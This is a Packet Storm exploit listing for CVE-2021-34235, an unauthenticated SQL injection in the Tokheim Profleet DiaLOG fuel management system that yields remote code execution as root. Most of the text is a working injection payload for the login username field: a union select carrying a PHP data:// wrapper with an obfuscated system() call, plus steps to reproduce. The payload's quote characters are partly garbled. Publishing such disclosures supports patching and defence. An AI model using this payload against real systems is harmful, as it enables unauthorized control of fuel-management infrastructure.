Lucene search

K
packetstormGolem445PACKETSTORM:165944
HistoryFeb 10, 2022 - 12:00 a.m.

Tokheim Profleet DiaLOG Fuel Management System 11.005.02 SQL Injection / Code Execution

2022-02-1000:00:00
golem445
packetstormsecurity.com
301

0.002 Low

EPSS

Percentile

56.6%

`# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)  
# Date: 02/9/2022  
# Exploit Author: golem445  
# Vendor Homepage: https://www.tsg-solutions.com  
# Tested on: Kali Linux  
# CVE: CVE-2021-34235  
# Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.  
  
==Steps to Reproduce==  
# Go to : http://dialog_host/login.php  
# Enter escaped MySQL query into the username field and submit, passwords doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(β€œuname -a”);?>’ -- -)  
# This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.  
  
==Notes==  
This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.  
`

0.002 Low

EPSS

Percentile

56.6%

Related for PACKETSTORM:165944